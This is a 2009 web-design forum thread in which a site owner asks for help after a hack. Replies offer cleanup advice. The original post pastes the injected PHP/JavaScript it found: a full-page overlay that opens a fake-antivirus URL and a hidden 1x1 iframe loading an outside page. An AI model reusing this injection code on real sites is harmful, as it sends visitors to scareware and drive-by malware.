Navigation
Marketplace
  Members Login:
Lost password?
  Forum Statistics:
Forum Members: 24,254
Total Threads: 80,792
Total Posts: 566,471
There are 1097 users currently browsing (tf).

Our Partners:

TalkFreelance     TalkFreelance Information     General Discussion :

site hacked google warnings too...pls help

Thread title: site hacked google warnings too...pls help
12-13-2009, 10:50 AM
tanicos is offline tanicos
Software:

tanicos is an unknown quantity at this point

Old  site hacked google warnings too...pls help

I wouldn't have noticed that my site was hacked if Google didn't sent me an email letting me know that he found some hidden keywords in my pages and it breaks their rules and some pages were taken of the index.
I took a look at my FTP and in that particular domain indeed there were some extra files like this:

1. a folder named .xdata which contained at least 300 html files with weird names like: 790-sports-animal.com.html; 2010-heisman-odds.html; agua-bella.html and so on. These html files contained urls and keywords
2. a file named Iog.php which contained the following code:

PHP Code:
document.write('<div style="position: absolute; top: 0; left: 0; width: 100%;  height: 4000px;  background-color: #FFFFFF; padding: 0px">');
function 
go()
{
window.open("http://antyvirusservicenow.com/hitin.php?land=20&affid=34100");
}
document.write('<center><table align=center cellpadding=0 cellspacing=0 style="border: 0px solid; border-color: #000000; width: 400px; height: 300px; padding: 30px; margin-top: 100px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: #000000;"><tr><td><br><br><br><br><br><br><br><br><br><br><center><input type=submit name=klik id=klik value="-=ENTER=-"  onclick="go();" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 40px; color: red; font-weight: bold; width: 300px; height: 60px; border: 2px solid; cursor: pointer"></center></td></tr></table></center></font></div><iframe src="http://levitt-tupa-wkolota.freehostia.com/k.html" width="1" height="1"></iframe>'); 
3. a logs file which again has a lot of links and keywords

I deleted these 2 files and folder but they are created every time. I also changed the .xdata folder permissions to 444 but it still changes itself to 777.

I couldn't find those keywords hidden in my pages at all.

Anyone has any clue?

Thanks

12-13-2009, 12:01 PM
santa is offline santa
Expertise: Design, HTML
Software: Espresso, Photoshop, Mail.app

santa is on a distinguished road

Send a message via ICQ to santa Send a message via AIM to santa Send a message via MSN to santa Send a message via Yahoo to santa Send a message via Skype™ to santa

Old

Download the whole site to your computer, clear the site's FTP files and things like that, then delete the "hacked" files that have keywords, and upload it again.

If that doesn't work, repeat again, looking HARDER for some malicious files that shouldn't be there.

12-13-2009, 06:00 PM
NeiL is offline NeiL
Expertise: Graphic/Web Design
Software: Photoshop CS3

NeiL is on a distinguished road

Old

some ones put a virus on your site which acts like an antivirus but infects what it can. i had to clean it from my mums computer a few weeks back.

12-13-2009, 06:31 PM
Village Genius is offline Village Genius
Expertise: Software
Software: Chrome, Notepad++

Village Genius will become famous soon enough

Old

There is a free program called Agent Ransack that can search though files in a given folder very quickly. I use it at work whenever I need to do a mass search. Download all the files from your site and do a search for the keywords and clean or delete the files.

Wipe the site (this will require some downtime) and upload the cleaned files. If this still persists, check your database and then the server itself.

12-13-2009, 07:00 PM
spencerp is offline spencerp
Expertise:
Software:

spencerp is an unknown quantity at this point

Send a message via AIM to spencerp Send a message via MSN to spencerp Send a message via Yahoo to spencerp

Old

Originally Posted by Village Genius View Post
There is a free program called Agent Ransack that can search though files in a given folder very quickly.
Thanks for that Dan! I haven't had this problem yet (knock on wood) but I'm sure that tool will come in handy in the future!